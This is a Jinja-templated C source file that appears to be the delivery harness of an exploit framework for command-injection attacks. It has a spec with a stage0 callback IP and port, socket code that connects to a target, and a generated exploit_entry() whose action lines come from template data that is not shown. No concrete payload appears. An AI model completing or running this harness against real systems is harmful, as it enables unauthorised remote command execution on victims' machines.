#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include "exploit_spec.h"

/*
 * RETURN(X) expands to a GNU statement expression whose only statement is
 * `return X;`, so a return can be written with function-call syntax:
 * RETURN(value);
 * NOTE(review): presumably this exists so that the generated action lines in
 * exploit_entry(), which are always rendered as `name(args);`, can return from
 * the function -- confirm against the action generator.
 */
#define RETURN(X) ({return X;})

/*
 * Generated constants: the template loop below emits one `#define NAME VALUE`
 * for every entry of `constants` whose `.value` is not none. Values of class
 * `bytes` are passed through the `cstring` filter; all others are emitted
 * as-is.
 */
{% set newline = joiner('\n') -%}
{% for name, value in constants.items() %}
{%- set value = value.value -%}
{%- if value is not none -%}
{{- newline() -}}
#define {{ name }} {{ value | cstring if value.__class__.__name__ == 'bytes' else value }}
{% endif -%}
{% endfor %}

/* Spec structure for the current run; NULL until exploit_entry() assigns it. */
static CommandInjectionV1* g_exp = NULL;
/* Shorthands for fields of the active spec; they dereference g_exp, so they
 * are only usable after exploit_entry() has set it. */
#define IP g_exp->stage0_ip
#define PORT g_exp->stage0_port

/*
 * Growable byte buffer shared by the blob_* helpers.
 *   blob      - heap storage, NULL while nothing has been allocated
 *   blob_size - number of valid bytes currently stored in blob
 *   blob_cap  - number of bytes allocated for blob
 */
char *blob = NULL;
size_t blob_size = 0;
size_t blob_cap = 0;

/*
 * Release the buffer and return the globals to their initial (empty) state,
 * ready for the next round of connections.
 */
void blob_reset(void)
{
    free(blob); /* free(NULL) is a no-op, so no guard is needed */
    blob = NULL;
    blob_size = 0;
    blob_cap = 0;
}

/*
 * Append `size` raw bytes from `data` to the end of the blob.
 *
 * Capacity starts at 1024 bytes and doubles until the new contents fit.
 * A zero-length append is a no-op (and `data` may then be NULL).
 *
 * The function has no way to report failure: if the new size would overflow
 * size_t, or the buffer cannot be grown, the blob is left exactly as it was
 * and the data is dropped.
 */
void blob_append(const char *data, size_t size)
{
    const size_t size_max = (size_t)-1;

    if (size == 0) {
        return;
    }
    if (size > size_max - blob_size) {
        return; /* blob_size + size would wrap around */
    }

    size_t needed = blob_size + size;
    if (needed > blob_cap) {
        size_t new_cap = (blob_cap == 0) ? 1024 : blob_cap;
        while (new_cap < needed) {
            if (new_cap > size_max / 2) {
                /* doubling would overflow; fall back to the exact size */
                new_cap = needed;
                break;
            }
            new_cap *= 2;
        }

        /* Keep the old pointer until realloc succeeds so it is not lost. */
        char *grown = realloc(blob, new_cap);
        if (grown == NULL) {
            return;
        }
        blob = grown;
        blob_cap = new_cap;
    }

    memcpy(blob + blob_size, data, size);
    blob_size = needed;
}

/*
 * Append printf-style formatted text to the blob. The terminating NUL that
 * vsnprintf produces is NOT appended.
 *
 * The output length is measured first with a zero-sized vsnprintf call, then
 * formatted into a buffer of exactly that size. Nothing is appended when the
 * formatted output is empty, when formatting fails, or when the temporary
 * buffer cannot be allocated.
 */
void blob_append_fmt(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);

    /* Measure on a copy: a va_list may not be reused after vsnprintf. */
    va_list probe;
    va_copy(probe, ap);
    int needed = vsnprintf(NULL, 0, fmt, probe);
    va_end(probe);

    if (needed > 0) {
        size_t buf_size = (size_t)needed + 1; /* +1 for the NUL */
        char *buf = malloc(buf_size);
        if (buf != NULL) {
            int written = vsnprintf(buf, buf_size, fmt, ap);
            if (written >= 0 && (size_t)written < buf_size) {
                blob_append(buf, (size_t)written);
            }
            free(buf);
        }
    }

    va_end(ap);
}

/* Append a string literal / char array without its trailing NUL. Only valid
 * for true arrays: sizeof on a pointer would give the pointer size. */
#define BLOB_APPEND_CONST(data) blob_append((data), sizeof(data) - 1)

/*
 * Open a TCP connection to the target described by g_exp.
 *
 * Uses AF_INET when g_exp->ip_type == IPv4 and AF_INET6 otherwise, parses
 * g_exp->target_ip with inet_pton(), and connects to
 * g_exp->override_target_port (for IPv6, g_exp->ipv6_scope_id is used as the
 * scope id).
 *
 * Returns the connected socket descriptor on success. On failure returns a
 * negated error code:
 *   -ERROR_LOCAL_RESOURCES_NOT_AVAILABLE  socket() failed
 *   -ERROR_INVALID_TARGET_IP              target_ip could not be parsed
 *   -ERROR_VULNERABLE_SERVICE_NOT_FOUND   connect() failed
 * The socket is closed on every failure path so no descriptor leaks.
 *
 * NOTE(review): the port always comes from g_exp->override_target_port, while
 * exploit_entry() copies that field into g_target_port only when it differs
 * from NO_TARGET_PORT_SPECIFIED -- confirm which one should be used here.
 */
static int connect_target(void)
{
    int sock;

    if (g_exp->ip_type == IPv4)
    {
        struct sockaddr_in target_addr;

        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            return -ERROR_LOCAL_RESOURCES_NOT_AVAILABLE;
        }

        /* Zero the whole structure so padding fields are well-defined. */
        memset(&target_addr, 0, sizeof(target_addr));
        target_addr.sin_family = AF_INET;
        target_addr.sin_port = htons(g_exp->override_target_port);
        if (inet_pton(AF_INET, g_exp->target_ip, &target_addr.sin_addr) <= 0) {
            close(sock);
            return -ERROR_INVALID_TARGET_IP;
        }

        if (connect(sock, (struct sockaddr *)&target_addr, sizeof(target_addr)) < 0) {
            close(sock);
            return -ERROR_VULNERABLE_SERVICE_NOT_FOUND;
        }
    }
    else
    {
        struct sockaddr_in6 target_addr;

        if ((sock = socket(AF_INET6, SOCK_STREAM, 0)) < 0) {
            return -ERROR_LOCAL_RESOURCES_NOT_AVAILABLE;
        }

        /* Zero the whole structure; sin6_flowinfo is never set explicitly. */
        memset(&target_addr, 0, sizeof(target_addr));
        target_addr.sin6_family = AF_INET6;
        target_addr.sin6_port = htons(g_exp->override_target_port);
        target_addr.sin6_scope_id = g_exp->ipv6_scope_id;
        if (inet_pton(AF_INET6, g_exp->target_ip, &target_addr.sin6_addr) <= 0) {
            close(sock);
            return -ERROR_INVALID_TARGET_IP;
        }

        if (connect(sock, (struct sockaddr *)&target_addr, sizeof(target_addr)) < 0) {
            close(sock);
            return -ERROR_VULNERABLE_SERVICE_NOT_FOUND;
        }
    }
    return sock;
}

/*
 * Send exactly `size` bytes from `data` on `sock`, calling send() repeatedly
 * until everything has been written.
 *
 * Returns `size` on success, or the negative value returned by send() as soon
 * as one call fails (bytes already sent are not reported in that case).
 */
ssize_t send_all(int sock, const char *data, size_t size) {
    size_t sent = 0;
    while (sent < size) {
        /* Resume after the bytes already written, not from the start. */
        ssize_t one_sent = send(sock, data + sent, size - sent, 0);
        if (one_sent < 0) {
            return one_sent;
        }
        sent += (size_t)one_sent;
    }
    return (ssize_t)sent;
}

/*
 * Read from `sock` until the peer closes its side (recv() returns 0) and
 * hand back everything received in one heap buffer.
 *
 * On success returns the number of bytes received and stores the buffer in
 * *data; the caller owns it and must free() it. The buffer carries one extra
 * NUL byte after the data (not counted in the return value) so it can also be
 * used as a C string. If no bytes were received, returns 0 and *data is NULL.
 *
 * On failure returns a negative value and sets *data to NULL: either the
 * value returned by the failing recv(), or -1 if memory ran out.
 */
ssize_t recv_all(int sock, char **data) {
    char *result = NULL;
    size_t result_size = 0;
    char buf[4096];

    for (;;) {
        ssize_t one_size = recv(sock, buf, sizeof(buf), 0);
        if (one_size < 0) {
            free(result);
            *data = NULL;
            return one_size;
        }
        if (one_size == 0) {
            *data = result;
            return (ssize_t)result_size;
        }

        size_t chunk = (size_t)one_size;
        /* Grow through a temporary so the old buffer is not lost on failure. */
        char *grown = realloc(result, result_size + chunk + 1);
        if (grown == NULL) {
            free(result);
            *data = NULL;
            return -1;
        }
        result = grown;
        memcpy(result + result_size, buf, chunk);
        result_size += chunk;
        result[result_size] = '\0';
    }
}

/*
 * Finish an exchange on `sock`: shut down the write side, read everything the
 * peer sends until it closes, close the socket, and pass the received data to
 * WRITE_STDOUT.
 *
 * Returns NO_ERROR_DETECTED on success, or ERROR_UNKNOWN_NO_ADDITIONAL_INFO
 * (after calling PERROR("recv")) when receiving fails. The socket is closed
 * on both paths.
 */
ExploitResult finish(int sock) {
    char *result = NULL;
    /* Must be signed: recv_all() reports failure with a negative value. */
    ssize_t result_size;

    shutdown(sock, SHUT_WR);
    result_size = recv_all(sock, &result);

    if (result_size < 0) {
        /* Report before close(), which could overwrite errno. */
        PERROR("recv");
        close(sock);
        return ERROR_UNKNOWN_NO_ADDITIONAL_INFO;
    }
    close(sock);

    /* recv_all() yields NULL when the peer sent nothing; skip the write then. */
    if (result != NULL) {
        /* NOTE(review): WRITE_STDOUT only receives the pointer; if it expects
         * a NUL-terminated string the buffer must be terminated by recv_all()
         * -- confirm. Freeing afterwards assumes WRITE_STDOUT does not retain
         * the pointer -- confirm. */
        WRITE_STDOUT(result);
        free(result);
    }
    return NO_ERROR_DETECTED;
}

/*
 * Entry point: receives the exploit-spec version and an opaque pointer to the
 * spec structure for that version.
 *
 * Only version 1 is accepted; any other value returns
 * ERROR_UNSUPPORTED_EXPLOIT_SPEC_VERSION. For version 1 the pointer is stored
 * in g_exp, an explicitly specified target port is copied into g_target_port,
 * and then the statements generated from the template's `actions` list run in
 * order.
 *
 * NOTE(review): no return statement follows the generated statements, so
 * presumably the last generated action is expected to return a value (e.g.
 * through RETURN(...)) -- confirm against the action generator.
 */
ExploitResult exploit_entry(uint32_t exploit_spec_version, const void* exploit_struct)
{
    if (exploit_spec_version != 1)
    {
        return ERROR_UNSUPPORTED_EXPLOIT_SPEC_VERSION;
    }

    // Assume exploit_struct points to a `struct CommandInjectionV1`; the
    // protocol offers no way to verify this. The cast also drops the `const`
    // qualifier of the parameter.
    g_exp = (struct CommandInjectionV1 *)exploit_struct;
    // Only override the target port when the caller actually specified one.
    if (g_exp->override_target_port != NO_TARGET_PORT_SPECIFIED) {
        g_target_port = g_exp->override_target_port;
    }

    // Generated body: one statement per entry of `actions`, rendered as
    // `[type name = ]function(arg, ...);` with arguments of class `bytes`
    // passed through the `cstring` filter.
{% set newline = joiner('\n') -%}
{% for action in actions %}
{{- newline() -}}
{{ '    ' }}
{%- if action.function_result.name -%}
    {%- set type = action.function_result.type_ -%}
    {{ type if type is string else type.__name__ }}
    {{- ' ' -}}
    {{ action.function_result.name }} ={{ ' ' }}
{%- endif -%}
    {{ action.function }}(
{%- set separator = joiner(', ') -%}
{%- for arg in action.args -%}
    {{- separator() -}}
    {{ arg | cstring if arg.__class__.__name__ == 'bytes' else arg }}
{%- endfor -%}
    );
{% endfor -%}
}
